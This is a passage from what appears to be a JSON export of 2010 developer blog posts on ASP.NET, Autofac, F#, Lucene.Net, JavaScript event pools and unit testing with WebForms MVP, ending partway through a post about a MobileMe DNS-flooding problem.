implicit cast to the type we actually wanting to return. This is provided to us from the bindingContext information which we are provided with.\nThen we just grab the first (or default), as there will only ever be zero or one match (we could use SingleOrDefault, but FirstOrDefault is slightly faster).\nAll that’s left is to get the data into the right type to be returned:\nvar value = bindingContext.ValueProvider.GetValue(bindingContext.ModelName).RawValue; result = implicitAssignment.Invoke(null, new object[] { value }); So we’re just dynamically invoking the implicit operator we found before, pass in the data we were provided and then return.\nAnd here’s the completed class:\npublic class ImplicitAssignmentBinder : IModelBinder { public object BindModel(ControllerContext controllerContext, ModelBindingContext bindingContext) { var implicitAssignment = bindingContext.ModelType.GetMethods(BindingFlags.Public | BindingFlags.DeclaredOnly | BindingFlags.Static) .Where(x => x.Name == "op_Implicit") .Where(x => bindingContext.ModelType.IsAssignableFrom(x.ReturnType)) .FirstOrDefault(); if (implicitAssignment == null) throw new ArgumentException(string.Format("The Implicit Assignment Binder was being applied to this request, but the target type was '{0}', which does not provide an implicit assignment operator.", bindingContext.ModelType)); var result = null as object; try { var value = bindingContext.ValueProvider.GetValue(bindingContext.ModelName).RawValue; result = implicitAssignment.Invoke(null, new object[] { value }); } catch (Exception ex) { var message = string.Format("An exception occurred when trying to convert the paramater named '{0}' to type '{1}'. {2}", bindingContext.ModelName, bindingContext.ModelType.Name, ex.Message ); throw new ArgumentException(message, ex); } return result; } } As you can see here I’ve got the error handling also included ;).\n", "id": "2010-06-14-aspnet-mvc-model-binding-with-implicit-operators" }, { "title": "Supporting ValueTypes in Autofac", "url": "https://www.aaron-powell.com/posts/2010-06-09-supporting-valuetypes-in-autofac/", "date": "Wed, 09 Jun 2010 00:00:00 +0000", "tags": [ "autofac", "c#" ], "description": "Autofac doesn't support injection of value types as properties, here's how to support it.", "content": "Today I had an interesting problem with Autofac in which I was registering an Enum that I wanted to inject into my different objects. Some of the injection was being done on the properties, as this is an ASP.NET project and I wanted to inject into are UserControls.\nBut when ever I was doing it, I wasn’t getting the registered value. My component registry was working file, if I manually tried to get it out it worked fine, but the property was not set!\nThis was getting really frustrating, so after a bit of debugging into the Autofac source I found that the problem was that during the wiring up there is a check of each property of the object to see if it is able to be injected. One of the conditions to ignore the property is whether it’s a ValueType.\nNow I’m not going to speculate about why it’s this way, I have a hunch but that’s beyond the scope of what I want to answer here, what I want to answer is the how to do it.\n##Working with Autofac events\nAutofac has a very nice feature of firing events during the component life cycle, for this we’ll use the OnActivating event which takes a delegate. The argument that gets passed into the method has all the data you could need to perform your changes to the object.\nWell here’s the delegate that you can use to inject ValueType properties:\n.OnActivating(x => { var instance = x.Instance; var instanceType = x.Instance.GetType(); var context = x.Context; foreach (Reflection.PropertyInfo property in instanceType.GetProperties(Reflection.BindingFlags.Public | Reflection.BindingFlags.Instance | Reflection.BindingFlags.SetProperty)) { var propertyType = property.PropertyType; //only look for ValueType's which are actually registered! if (propertyType.IsValueType && context.IsRegistered(propertyType)) { object propertyValue = context.Resolve(propertyType); property.SetValue(instance, propertyValue, null); } } }) Hopefully this will solve a problem if you come across it yourself.\n", "id": "2010-06-09-supporting-valuetypes-in-autofac" }, { "title": "Writing Presenters with F#", "url": "https://www.aaron-powell.com/posts/2010-05-30-writing-presenters-with-fsharp/", "date": "Sun, 30 May 2010 00:00:00 +0000", "tags": [ "webformsmvp", "f#", "fsharp" ], "description": "This may not be the best idea, but hey, why not, let's writing Presenters with F#!", "content": "Disclaimer: I’m not an F# developer, I’m really only just learning and having a bit of a play around.\n#What\nAfter a few beers the other day I had a great idea, why not write a demo of using WebForms MVP and F#. Sure, seems fun, seems crazy, seems like a silly idea! :P\nBut there was method in my (alcohol induced) madness, looking in F# as an option for development isn’t a bad idea. F# as a functional languages offers some advantages which can’t be achieved with a static language like C# or VB.NET, and since it does have some OO principles we can define types, use inheritance, all the stuff we can do with the other languages, so why can’t we use it in a web scope?\nI’m not the first people who’s tried using F# with ASP.NET, it’s more about applying it in a different manner, in the scope of the WebForms MVP.\nHey, if this really works why couldn’t you work with F# and Umbraco ;).\n#Getting Started\nFirst step is the need to create a F# Class library (I’m going to separate my UI into a standard C# web project for this):\nSo for this I’m going to create a very simple little Hello World demo, so for this I’m going to require 2 classes, I need a Presenter and a Model. Clear out the default files and next I make one called HelloWorldPresenter, it’s just a standard F# Script file. Then I create a separate one called HelloWorldModel.\nKeep in mind that the order of types does matter in F#, so since (as I’ve stated) the Model file is created 2nd it’ll appear in the project 2nd. You’ll need to move it up to above the other file so that the type does get created by the time we actually need it.\nLet’s define our types:\nnamespace WebFormsMvp.FSharp.Views.Models type HelloWorldModel = class val mutable private msg : string new() = { msg = "" } member self.Message with get() = self.msg and set (value) = self.msg <- value end So here I’m just defining a simple class with a string property which can be modified (hence the mutable keyword). It’s a very basic Model, it’s not really complex but it’ll give you the idea of what can be done.\nNext let’s make a Presenter:\nnamespace WebFormsMvp.FSharp.Presenters open WebFormsMvp open WebFormsMvp.FSharp.Views.Models open WebFormsMvp.FSharp.Wrapper type HelloWorldPresenter = class inherit PresenterBase<IView<HelloWorldModel>> new (view) as self = { inherit PresenterBase<IView<HelloWorldModel>>(view) } override self.OnLoad(sender, e) = self.View.Model.Message <- "Hello World!" override self.ReleaseView() = ()\tend First we need to import and few namespaces, we need the WebFormsMvp namespace, the namespace for my Model class, and I’ve also imported the namespace of a base class which I’ve made to help. For some reason (most likely my lack of knowledge around F#) I was getting a compile error when creating the event handler, you should be able to do this in the constructor:\nself.View.Load.Add(fun (sender:obj) (args:EventArgs) -> self.View.Model.Message <- "Hello World!") But as I said, that was creating a compile error so I created a base class (in C#) which assigned the event handler for me which I can then override.\nThat aside we can use the base class method to write to the Model.Message property, which ultimately, is what we want to do.\nAll that’s left is that we need to create a C# Web Application Project and start the final implementation. Let’s see how that looks:\nusing WebFormsMvp; using WebFormsMvp.FSharp.Presenters; using WebFormsMvp.FSharp.Views.Models; using WebFormsMvp.Web; namespace WebformsMvp.FShap.Web.UserControls { [PresenterBinding(typeof(HelloWorldPresenter))] public partial class HelloWorld : MvpUserControl<HelloWorldModel>, IView<HelloWorldModel> { } } It looks exactly like the HelloWorldPresenter came from any other language class library!\nIt just works like you’d expect it to.\n##Now What?\nWell this was really just a thought experiment, looking at how we could be a bit unconventional in your development approach. Whether or not this is viable in a real-world scenario is a matter of perspective. Currently for me it’s not viable, but that’s really because I don’t have much in the way of F# skills.\nIf you were an F# developer this is an easy way to go about integrating F# into an ASP.NET Web Forms application, and in a unit-testable manner.\n", "id": "2010-05-30-writing-presenters-with-fsharp" }, { "title": "Analyzers in Lucene.Net", "url": "https://www.aaron-powell.com/posts/2010-05-27-lucene-analyzer/", "date": "Thu, 27 May 2010 00:00:00 +0000", "tags": [ "lucene.net", "c#", ".net", "examine", "umbraco-examine" ], "description": "", "content": "What is an Analyzer?## When you want to insert data into a Lucene index, or when you want to get the data back out of the index you will need to use an Analyzer to do this.\nLucene ships with many different Analyzers and picking the right one really comes down to the needs of your implementation. There are ones for working with different languages, ones which determine how words are treated (and which words to be ignored) or how whitespace is handled.\nBecause Analyzers are used for both indexing and searching you can use different ones for each operation if you want. It’s not generally best practice to use different Analyzers, if you do you may have terms handled differently. If you used a WhitespaceAnalyzer when you do your indexing but a StopAnalyzer for retrieval although the word “and” is fine for indexing it wont be found when searching.\nCommon Analyzers## Not all of the Analyzers are useful in common scenarios, hopefully this will help you work out which one to use for your scenarios.\nKeyword Analyzer### This Analyzer will treat the string as a single search term, so if you needed to handle say a product name (which has spaces in it) as a single search term then this is likely the one you want. It doesn’t concern itself with stop words or anything of the like, but it’s not really that good if you’ve got a large block of text that you want to insert into the index.\nStop Analyzer & Standard Analyzer### These are the most common Analyzers you’ll come across when working with Lucene, in fact the StandardAnalyzer is the default one which is used within Examine (you can specify in the config the Analyzer for both indexing and searching though).\nThe StandardAnalyzer actually combines parts of the StopAnalyzer, StandardFilter & LowerCaseFilter. The StandardAnalyzer understands English punctuation for breaking down words (hyphens, etc), words to ignore (via the StopAnalyzer) and technically case insensitive searching (by doing lowercase comparisons).\nThe StopAnalyzer (which is kind of a lesser version of the StandardAnalyzer) understands standard English words to ignore. This actually got me unstuck at one point, I was trying to search on the letter A in a field (which only contained a single letter) and any match with the letter A was being ignored. This is because the following list of words are skipped over by the Analyzer:\n"a", "an", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "no", "not", "of", "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with" So if I was to search on this world rocks then I’d only have matches on world or rocks, the word this is ignored.\nWhitespace Analyzer### The WhitespaceAnalyzer is also a bit of a sub-set of the StandardAnalyzer, where it understands word breaks in English text, based on spaces and line breaks.\nThis Analyzer is great if you want to search on any English word, it doesn’t ignore stop words so you can search on a or the if required. This was how I got around the problem I described above.\nConclusion## Understanding Analyzers can be a tricky aspect of Lucene, and it can be the cause of some grief if they are not properly handled.\nThe general rule of the thumb is that the StandardAnalyzer will do what you require, giving you well structured results and filter out irrelevant English language words, but the other main Analyzers will help filter down results based in your requirements.\nAnd if you feel like getting really crazy (or you’re dealing with non-English content) there are plenty of other Analyzers within Lucene you can look int.\n", "id": "2010-05-27-lucene-analyzer" }, { "title": "Client Event Pool", "url": "https://www.aaron-powell.com/posts/2010-05-23-client-event-pool/", "date": "Sun, 23 May 2010 00:00:00 +0000", "tags": [ "javascript", "ajax", "ms-ajax" ], "description": "Client event pools are great to have disconnected AJAX components on a page", "content": "I read an article last year about implementing a Client Event Pool and I really liked the concept. Joel shows a very good way to use it but I’ve been doing my best to find a logical use for it myself.\nAnyone not familiar with the concept of a Client Event Pool it’s covered in Joel’s post, but the short version is that a Client Event Pool is a browser-level event handler which is designed to allow events to be easily passed between unlinked components. One component can raise an event which can be chosen to be handled by any other. Inversely events can be listened for even if the component isn’t on the page or the event isn’t used.\nThis isn’t really a new concept, you can achieve it (to a certain extent) with standard ASP.NET, with the OnClient<EventName> which is on a lot of the standard ASP.NET controls.\nAnd in this article I’m going to look at how to integrate a Client Event Pool with the ASP.NET AJAX Control Toolkit’s Modal Popup. Now, don’t get me wrong, this isn’t the only way to add the events to a modal popup control, there are a lot of event handlers which can be added without a Client Event Pool.\nThis all came about when I was tasked with integrating a login, forgotten password and change password component. Each were their own modal popups and each were separate .NET UserControls. I wasn’t involved with developing any of them, and I didn’t want to really do much to modify any of them too much and introduce more bugs in the system by screwing around with stuff I’m not familiar with. Because they are all separate I didn’t have a real way to pass the ID of the control that was to make the popup appear. Oh, and to make thing more complicated there were 2 links for each popup, sadly the Modal Popup doesn’t support multiple controls to do the popping-up (or as far as I’m aware…)\nI also didn’t want each of the popups to overlay each other, it doesn’t really look that good (as I’ll show shortly), so I needed a way to hide the master popup when the child was shown, and then when the child was hidden I want the master to reappear.\nSo I’m doing 3 basic controls for my example, a Login control:\nFull size\na Forgotten Password control:\nFull size\na Registration control:\nFull size\nAnd add a dash of CSS and you get a lovely little popup:\n(Ok, so my design skills aren’t great!)\nSo now it’s time to tie up the master control with the child controls. To do this I’m going to have 2 events raised from the child controls, one for when the popup is shown and one for when it is hidden. I’m also going to have an event which can be raised elsewhere on each child control which will initiate the showing of the popup (you could add one for the hiding, but I’m using the inbuilt hiding from the CancelControlID property of the modal popup).\nFor each they will look as follows:\nFull size\nLets have a look at how they work, first off I locate the the Sys.Component instance of the ModalPopup control. There are showing and hiding events fired off from the ModalPopup, so I’m going to add a handler, the handler though will just be a stub which in-turn raises an event within our Client Event Pool. I’ve given them names which will indicate what they are used for. Lastly I’m going to add an event handler so anyone can raise an event which will show the popup.\nNow lets have a look in the Login control:\nFull size\nThe first 2 lines of this is adding event handlers to the links on the control. All they do is tell the Client Event Pool to raise an event, an event which I previously set up to be consumed by the child controls.\nNext we set up the Client Event Pool to listen for the hide and show events from our child controls. It listens for the events to be raised and when they are it’ll either hide or show the modal on the current page. Admittedly I’ve gone a little bit overboard with my events between the two child controls. Each could just raise events like hideParent and showParent, and then I would only need 2 handlers against the Client Event Pool, but to illistrate my point I’ve gone the verbos method.\nNow I’ve gone for having the popups showing like this:\nTo this:\nAdmittedly static images can’t really show how it works, but it’s much nicer to not overlay popups, and ability to having popups automatically hiding and showing the loss-of-focus ones is a really sweet idea.\nI’ll admit that it’s possible to do this without the need for a Client Event Pool, you can expose all the appropriate properties on the child controls which then can be set appropriately within it’s parent, but think of it a step further, if you wanted a link on the Forgot Password to the Registration page. Because they aren’t really aware of each other it is very difficult to achieve (but not impossible). Your UserControl can also expose wrappers to the Showing and Hiding client events on the modal popup, but it still has the same problem as mentioned previously.\nAnd there we have it, a nice little example of how to use a Client Event Pool to make it easier to link previously unlinked components in a soft way.\nThe source code for this article can be found here.\nFramework agnostic So in the above demo I’ve shown how to play around with it if you’re using MS Ajax, but not every site we build will have MS Ajax as part of it.\nI was recently doing a build where I wanted to use the event pool concept, but didn’t want to use MS Ajax. So I set about simulating the concept in a framework agnostic way.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 EventManager = (function() { var events = {}; var getEvent = function(id) { if (!events[id]) { events[id] = []; } return events[id]; }; return { bind: function(name, fn) { var e = getEvent(name); e.push(fn); }, trigger: function(name, source, args) { var evt = getEvent(name); if (!evt || evt.length === 0) return null; evt = evt.length === 1 ? [evt[0]] : Array.apply(null, evt); for (var i = 0, l = evt.length; i < l; i++) { if (args.constructor !== Array) args = [args]; evt[i].apply(source, args); } } }; })(); This will create a global EventManager object (which sits at the window level) which has a bind and trigger event (which is the naming convention used by jQuery).\nYou bind to EventManager an event name you want to listen for, like so:\n1 2 3 EventManager.bind("hideParent", function(args) { /* do stuff */ }); The args property is actually an array of all the arguments passed into the method by the trigger method, which is used like so:\n1 EventManager.trigger("hideParent", this, { Hello: "World" }); args can really be anything, from an object to an array, but I like to use single objects when passing around. You also need to pass in an object into the 2nd parameter which defines what will be used for the this scope of the event handlers which are triggered.\nConclusion Hopefully this has been a bit of fun looking at how you can use MS Ajax or a generic implementation of a client event pool to have disconnected AJAX functionality.\n", "id": "2010-05-23-client-event-pool" }, { "title": "ASP.NET WebForms Model-Video-Presenter", "url": "https://www.aaron-powell.com/posts/2010-05-18-webforms-mvp/", "date": "Tue, 18 May 2010 00:00:00 +0000", "tags": [ "asp.net", "webforms-mvp" ], "description": "Articles, links and helpful tidbits for working with Webforms MVP", "content": "ASP.NET WebForms MVP is a really handy project which aims to bring testability to WebForms development.\n##WebForms MVP Contrib\nA look at the ASP.NET WebForms MVP Contrib project ##Useful Hits\nTesting messaging within a presenter Unit Testing with Umbraco ##Fun Stuff\nWriting Presenters with F#\n", "id": "2010-05-18-webforms-mvp" }, { "title": "Testing Messaging Within a Presenter", "url": "https://www.aaron-powell.com/posts/2010-05-18-testing-messaging-within-a-presenter/", "date": "Tue, 18 May 2010 00:00:00 +0000", "tags": [ "asp.net", "webforms-mvp" ], "description": "Cross-Presenter messaging is really handy, and here's how to do testing of it when it's in a presenter", "content": "Cross-Presenter messaging is a great way which you can have two presenters which don’t know about each other, but may have a reliance on data from the other.\nThere’s a good demo up on the WebForms MVP wiki which shows how it can be implemented.\nOne really handy feature of this is that you can have something happen when the message never arrives. Lets say for example we have a presenter which shows a set of promotions pulled from a global store. But I also want the ability to set the promotions on a per-page basis. So if there’s no promo’s for this page I want to see the global ones.\n##Setup##\nI’ll have my promotions presenter like this:\npublic class PromoPresenter : Presenter<IView<PromoModel>> { private IPromoService service; public PromoPresenter(IView<PromoModel> view, IPromoService service) : base(view) { this.service = service; this.View.Load += View_Load; } void View_Load(object sender, EventArgs e) { //TODO } public void ReleaseView() { this.View.Load -= View_Load; } } Now I need to add some functionality to the View_Load method so that it loads in from either the messages or not (ignore the implementation of IPromoService, it’s not important for this demo).\nvoid View_Load(object sender, EventArgs e) { Messages.Subscribe<IEnumerable<IPromo>>(promos => this.View.Model.Promos = promos, () => this.View.Model.Promos = this.service.GetGlobalPromos()); } So we also need a PagePresenter which may have promo boxes that are in-context to display.\npublic class PagePresenter : Presenter<IView<PageModel>> { private IContentService service; public PagePresenter(IView<PageModel> view, IContentService service) : base(view) { this.service = service; this.View.Load += View_Load; } void View_Load(object sender, EventArgs e) { var page = this.service.CurrentPage(); //set some model stuff about the page Messages.Publish<IEnumerable<IPromo>>(page.Promotions); } public void ReleaseView() { this.View.Load -= View_Load; } } ##Unit Testing##\nThis is pretty simple, and it should just work, but I’m a good developer, so how do I setup the unit tests to ensure that the right methods are called?\nWe need to simulate the underlying MessageBus of WebForms MVP, but that’s nothing you need to worry about when working with WebForms MVP, it does that on our behalf.\nAnd this is a situation I found myself in, I wanted to test both the message received and message not received functionality. So I started off looking into the source for WebForms MVP, they have tests kind of doing what I wanted, but not the full end-to-end which I required.\nSo let’s look at how to do it:\nA few assumptions, I’m using MS Test and RhinoMocks\n[TestMethod] public void PromoPresenterTests_From_Service_When_No_Message_Published() { //Arrange var view = MockRepository.GenerateStub<IView<PromoModel>>(); view.Model = new PromoModel(); var service = MockRepository.GenerateMock<IContentService>(); service.Expect(x => x.GetGlobalPromos()).Return(MockRepository.CreateStub<IEnumerable<IPromo>>()); var presenter = new PromoPresenter(view, service); var messageCoordinator = new MessageCoordinator(); presenter.Messages = messageCoordinator; //Act view.Raise(x => x.Load += null, null, null); presenter.ReleaseView(); messageCoordinator.Close(); //Assert Assert.IsNotNull(view.Model.Promos); service.VerifyAllExpectations(); } There’s not much different I’d have done if it was just a standard WebForms MVP test (or any other test for that matter) but I’m putting an expectation of my IContentService that I am calling the GetGlobalPromos method. What comes back is not important, just that something comes back.\nNext you need to setup a MessageCoordinator. This is what is responsible for the MessageBus, handling the publishing and subscription of the events.\nYou can either make a mock version if you want to be really explicit and set an expectation on the Messages.Subscribe call, but I’m not wanting that. I’ll just use the MessageCoordinator class which comes from WebForms MVP itself. This also means that I’m getting it operate pretty much the same as if it was really running.\nSince this test is verifying the no messages published operation I just want to close the MessageCoordinator as soon as I’ve raised the View.Load event, (which is where the subscription happens).\nNext we’ll test the Message.Publish will work like we expect it to:\n[TestMethod] public void PromoPresenterTests_No_Service_When_Published() { //Arrange var view = MockRepository.GenerateStub<IView<PromoModel>>(); view.Model = new PromoModel(); var service = MockRepository.GenerateMock<IContentService>(); var presenter = new PromoPresenter(view, service); var messageCoordinator = new MessageCoordinator(); presenter.Messages = messageCoordinator; //Act view.Raise(x => x.Load += null, null, null); presenter.ReleaseView(); messageCoorindator.Publish(MockRepository.CreateStub<IEnumerable<IPromo>>()); messageCoordinator.Close(); //Assert Assert.IsNotNull(view.Model.Promos); service.AssertWasNotCalled(x => x.GetGlobalPromos()); }\tThis test is basically the same as the last one, but instead of setting an expectation on the GetGlobalPrommos method I’m putting an AssertWasNotCalled which is an extension method from RhinoMocks.\nAlso, we’re doing a Publish via our MessageCoordinator, before we close it off, which is how we would expect it to run in the web implementation (yes, you could setup an expectation on your mock objects if you want to go deeply into it).\n###PagePresenter?###\nYou’ll notice that the tests here are only covering the PromoPresenter, not the PagePresenter. Well to do a full test you would need something like this:\n[TestMethod] public void PromoPresenterTests_Published_From_Other_Presenter() { //Arrange var promoView = MockRepository.GenerateStub<IView<PromoModel>>(); promoView.Model = new PromoModel(); var service = MockRepository.GenerateMock<IContentService>(); var promoPresenter = new PromoPresenter(promoView, service); var messageCoordinator = new MessageCoordinator(); promoPresenter.Messages = messageCoordinator; var pageView = MockRepository.GenerateStub<IView<PageModel>>(); var page = MockRepository.GenerateStub<IPage>(); page.Stub(x => x.Promotions).Return(MockRepository.CreateStub<IEnumerable<IPromo>>()); service.Stub(x => x.CurrentPage()).Return(page); var pagePresenter = new PagePresenter(pageView, service); //Act promoView.Raise(x => x.Load += null, null, null); pageView.Raise(x => x.Load += null, null, null); promoPresenter.ReleaseView(); pagePresenter.ReleaseView(); messageCoordinator.Close(); //Assert Assert.IsNotNull(view.Model.Promos); service.AssertWasNotCalled(x => x.GetGlobalPromos()); } Here we’re creating both presenters, using their views and raising their load events so that the Messages should be passed around correctly.\n##Conclusion##\nThe Messaging system of WebForms MVP is really powerfully, and hopefully this has show you just how you can do all your unit testing around it.\n", "id": "2010-05-18-testing-messaging-within-a-presenter" }, { "title": "2009, a year in review", "url": "https://www.aaron-powell.com/posts/2010-04-25-2009-a-year-in-review/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "year-review" ], "description": "", "content": "So a new decade is upon us and with 2009 wrapped up it’s time to look retrospectively at the year that was.\n2009 was the biggest year professionally that I’ve had, the whole year has been filled with new adventures into the development world.\nAt the start of the year I announced my first Open Source project, the Umbraco Interaction Layer (UIL) was ceasing development as I’d joined the Umbraco core development team.\nI had lot of fun delving into LINQ in greater depths, like commenting on the difference between LINQ query syntax vs LINQ methods syntax, then having more fun by writing a JavaScript LINQ implementation.\nNext I took up a pleasure of mine, doing bizar coding, first with recursive anonymous self executing functions in JavaScript and then I wrote it in .NET too!\nAlso I was luck enough to get invited to Code Garden 09 in Copenhagen, which was an awesome trip and a great chance to meet other Umbracians from around the world. One of the outcomes was the first AUSPAC webinar (with the 2nd coming in the new year). Also coming out of my Denmark trip was a new employment opportunity which saw me moving from my home town of Melbourne to Sydney to join Shannon at TheFARM.\nUmbraco managed to get out Umbraco 4.1 Beta 1 on time, although the scheduled has since been revised (there will be more information coming shortly on this). And to celebrate the occasion I released a set of videos on using LINQ to Umbraco.\nThen to finish the year off I released a new Open Source project, ASP.NET Web Forms Model-View-Presenter Contrib.\nWhat a busy year! Hopefully 2010 can prove to be just as exciting :D\n", "id": "2010-04-25-2009-a-year-in-review" }, { "title": "Dealing with type-casting limitations", "url": "https://www.aaron-powell.com/posts/2010-04-25-dealing-with-type-casting-limitations/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ ".net", "c#", "c#-4", "dynamic", "type-casting", "umbraco" ], "description": "Looking at a limit with type casting in .NET 3.5 and how .NET 4.0 can help solve it.", "content": "Well this is the first post involving the .NET 4.0 framework, woo :D. Something I’ve had a problem with from within the abstract service lay which we use at TheFARM. It’s a limitation of the .NET framework and how you can do type casting within the .NET framework.\nThe way we use our service layer is to never return classes, we only return interfaces, so you can’t write a method which looks like this:\npublic IEnumerable<IProduct> GetProducts() { return ctx.Products.AsEnumerable(); } This will throw an exception, even if the class Product implements the IProduct interface. To achieve it you need to do this:\npublic IEnumerable<IProduct> GetProducts() { return ctx.Products.Cast<IProduct>(); } This is a bit of a pain if you’re doing complex type conversion though, particularly with our LINQ to Umbraco framework (not the actual LINQ to Umbraco framework coming in Umbraco 4.1).\nThe problem really came up when I decided I wanted to change from using a constructor which takes an XElement, so you could write cleaner code like this:\npublic IEnumerable<IUmbEvent> GetEvents() { XElement xNode = UmbXmlLinqExtensions.GetNodeByXpath(EventContainerXPath); var eventData = xNode .UmbSelectNodes() //selects all descendant "node" nodes //selects nodes of a certain alias .UmbSelectNodesWhereNodeTypeAlias(EventNodeTypeAlias) //This does the object conversion .Select(x => (UmbEvent)x) //ensure we don't return events with no start date .Where(x => x.FromDate != DateTime.MinValue); return eventData.Cast<IUmbEvent>(); } Still we’re doing a Select and a Cast, since now I’ve got an explicit operator defined for doing the conversion between XElement and UmbEvent, so I thought, why can’t I just do this:\npublic IEnumerable<IUmbEvent> GetEvents() { XElement xNode = UmbXmlLinqExtensions.GetNodeByXpath(EventContainerXPath); var eventData = xNode .UmbSelectNodes() //selects all descendant "node" nodes //selects nodes of a certain alias .UmbSelectNodesWhereNodeTypeAlias(EventNodeTypeAlias) //This does the object conversion .Cast<UmbEvent>() //ensure we don't return events with no start date .Where(x => x.FromDate != DateTime.MinValue); return eventData.Cast<IUmbEvent>().ToList(); } But alas that wont work, due to the way the Cast method works it’s not possible, very annoying. So I can’t directly return a collection of types which implement the required interface, and I can’t use the Cast method to just do all the conversions, I have to write select methods. This just means I have a bunch of code smell, it’s not really causing any problems, it’s just ugly. I do love some clean code, and this isn’t really it :(\nSo I thought, why not write my own extension method to do the casts, something that has a return statement like this:\nyield return (TInterface)(TType)item; Assuming that TType inherits TInterface, you can write generic constrictions which handles that, but you will receive a compile error, it can’t be confirmed by the compiler that the type of item implements an explicit operator to cast it as TType.\nDamn, looks like we can’t do it with .NET 3.5.\n##Enter the world of .NET 4.0##\nSo I decided to see if I can actually achieve it, no matter what was required, but I didn’t want the code to look too terrible.\nAs I’m sure you’re all aware .NET 4.0 is bringing in a new keyword, dynamic, which then in turn works with the DLR to do the runtime operation. And you know what, we can leverage the runtime feature to delay the conversion.\nLets have a look at the extension method, and then we’ll break it down:\npublic static IEnumerable<TInterface> AsType<TType, TInterface>(this IEnumerable source) where TInterface : class where TType : TInterface, new() { if (!typeof(TInterface).IsInterface) { throw new ArgumentException("TInterface must be an Interface type"); } foreach (var item in source) { dynamic d = item; yield return (TInterface)(TType)d; } } So I’ve got an extension method which has 3 types in it:\nType for the collection items Type of the class Type of the interface I’m doing a check of the TInterface type to make sure it is an Interface, if it’s not then we’d have a problem :P\nThe really exciting part is this:\nforeach (var item in source) { dynamic d = item; yield return (TInterface)(TType)d; } Here we enumerate through our collection, but turn each item into a dynamic version! This means we can then do the complete type conversion and delay its evaluation until runtime!\nWoo! Now I can have code like this:\nIEnumerable<int> numbers = Enumerable.Range(0, 10); IEnumerable<IMyType> casted = numbers.AsType<MyType, IMyType>(); Sweet, now I can make my service method like this:\npublic IEnumerable<IUmbEvent> GetEvents() { XElement xNode = UmbXmlLinqExtensions.GetNodeByXpath(EventContainerXPath); return xNode .UmbSelectNodes() //selects all descendant "node" nodes .AsType<UmbEvent, IUmbEvent>() .Where(x => x.FromDate != DateTime.MinValue); } So pretty, I’m much happier… well once I can get to use more .NET 4.0. Oh, and yes, there is a performance hit for this, since we’re using the DLR the conversion is evaluated at runtime, not compile time. It’s probably not huge (I didn’t do any performance testing), but just something to be kept in mind.\n", "id": "2010-04-25-dealing-with-type-casting-limitations" }, { "title": "Exception thrown when using XSLT extensions", "url": "https://www.aaron-powell.com/posts/2010-04-25-exception-thrown-when-using-xslt-extensions/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "xslt" ], "description": "A common problem when writing XSLT extensions", "content": "This is a question I was asked today but it’s also something which I have come across myself when creating XSLT extensions.\nHave you ever had this exception thrown?\nSystem.MissingMethodException: No parameterless constructor defined for this object.\nat System.RuntimeTypeHandle.CreateInstance(RuntimeType type, Boolean publicOnly, Boolean noCheck, Boolean& canBeCached, RuntimeMethodHandle& ctor, Boolean& bNeedSecurityCheck) at System.RuntimeType.CreateInstanceSlow(Boolean publicOnly, Boolean fillCache) at System.RuntimeType.CreateInstanceImpl(Boolean publicOnly, Boolean skipVisibilityChecks, Boolean fillCache) at System.Activator.CreateInstance(Type type, Boolean nonPublic) at umbraco.macro.GetXsltExtensions() at umbraco.macro.AddMacroXsltExtensions() at umbraco.presentation.webservices.codeEditorSave.SaveXslt(String fileName, String oldName, String fileContents, Boolean ignoreDebugging)\n(The complete stack trace may be different, it’s the thrown exception that should be of note)\nSo what causes this? Well Umbraco loads its XSLT extensions (from xsltExtensions.config) using Reflection, and it looks for a public default constructor, which is the constructor which takes no arguments.\nBasically if you’re writing a constructor for your XSLT extensions class you must make sure you have a default one too, so your extensions class must look like this at lease:\npublic class MyXsltExtensions { public MyXsltExtensions() { } ... } If you’re not defining your own constructor though this isn’t a problem.\nI only came across this bug when I was trying to define the default constructor as private, attempting to do a very tight API design (not exposing constructors where I didn’t want them). Whoops!\n", "id": "2010-04-25-exception-thrown-when-using-xslt-extensions" }, { "title": "Handy extension method for null-coalesing", "url": "https://www.aaron-powell.com/posts/2010-04-25-handy-extension-method-for-null-coalesing/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [], "description": "", "content": "Today a colleague asked me a question:\n“How do you do a null-coalesce operator which will return a property of an object when not null?”\nIf you’re not familiar with the null coalesce operator it’s the ?? operator and it can be used for inline expressions when the test object is null.\nYou use it like so:\nstring test = null; Console.WriteLine(test ?? "The string was null"); So it either returns itself or it returns your value, but what if you want to return a property of the object not itself, well you can’t use the ?? operator.\nBut never fear, extension methods are here! I wrote this quick little one for him:\npublic static TResult NullCoalese<TTarget, TResult>(this TTarget o, Func<TTarget, TResult> func, TResult whenNull) { return o == null ? whenNull : func(o); } Stick this in a namespace, maybe restrict the type of TTarget (or leave it as anything in .NET land, what ever takes your fancy, but if you don’t restrict it maybe don’t leave it in a common namespace!) and use it like this:\nstring test = null; test.NullCoalese(x => Console.WriteLine(x), "Null was suppled"); Enjoy :).\n", "id": "2010-04-25-handy-extension-method-for-null-coalesing" }, { "title": "Oh woe is (Mobile)Me", "url": "https://www.aaron-powell.com/posts/2010-04-25-oh-woe-is-mobile-me/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "mobile-me", "fail" ], "description": "", "content": "Anyone who is (lucky enough to be) on my msn contact list (and signed in during my work hours) will have seen something curious happening over the past week since I returned back to work.\nFor those of you not, basically I was signing in and out constantly with a frequency of say every 10 minutes. This oddly made is surprisingly hard to hold a conversation with someone. But more problematic was that not only was msn dropping out but the whole internet was. You could hardly even achieve a successful Google search.\nAnd this wasn’t just a problem for me, but for everyone here at TheFARM.\nThe first assumption was that it was something wrong with our ISP, we’re not on a super faster internet connection, and no one had problems outside of work, so it seemed like a logical assumption… right?\nWell it turns out that when you assume you make an ass out of you and me (ha, see what I did there! :P). The problem wasn’t our internet, in fact the problem could be blamed on one individual, yep you guessed it, me :(.\nTurns out that when I wasn’t on the network everything was fine, everyone could use the web, chat on msn, do what ever they wanted, but as soon as I plugged in, BAM, the internet died. So after a bit of detective work (mostly by Shannon) it was concluded that my computer was doing something nasty to the network. So we cracked out a copy of Wireshark and decided to do some detective work with packet sniffing.\nImmediately it was obvious what was happening, I was flooding our DNS server with requests, requests that the 